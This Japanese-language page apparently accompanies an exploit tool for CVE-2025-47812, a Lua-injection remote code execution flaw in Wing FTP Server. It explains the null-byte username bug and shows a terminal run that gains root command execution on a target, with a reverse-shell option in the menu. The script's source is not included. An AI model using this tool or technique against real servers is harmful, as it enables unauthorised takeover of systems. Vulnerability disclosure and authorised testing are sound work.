
CVE-2025-47812
CVE-2025-47812 は、Wing FTP Server バージョン 7.4.4 より前のバージョンに影響を与える 重大なリモートコード実行 (RCE) 脆弱性です。セキュリティ研究者によって発見され、実際に活発に悪用されている ことが確認されています。
この脆弱性は、Wing FTP Server の 認証ロジック、特に username パラメータ内の ヌルバイト (\0) の処理方法に起因します。
攻撃者はユーザー名フィールドを介して 任意の Lua コード を注入でき、サーバーはそれをセッションファイルに書き込みます。その後、このセッションファイルが処理されると、注入された Lua コードが実行され、攻撃者はシステムレベルのコマンドを実行できるようになります。
/loginok.html を信頼できないネットワークに公開していないことを確認してください。┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
このエクスプロイトは教育目的のみで提供されています。 責任を持って、テストする明示的な許可を得たシステムでのみ使用してください。 作者は、このツールの誤用やそれによって生じた損害について一切の責任を負いません。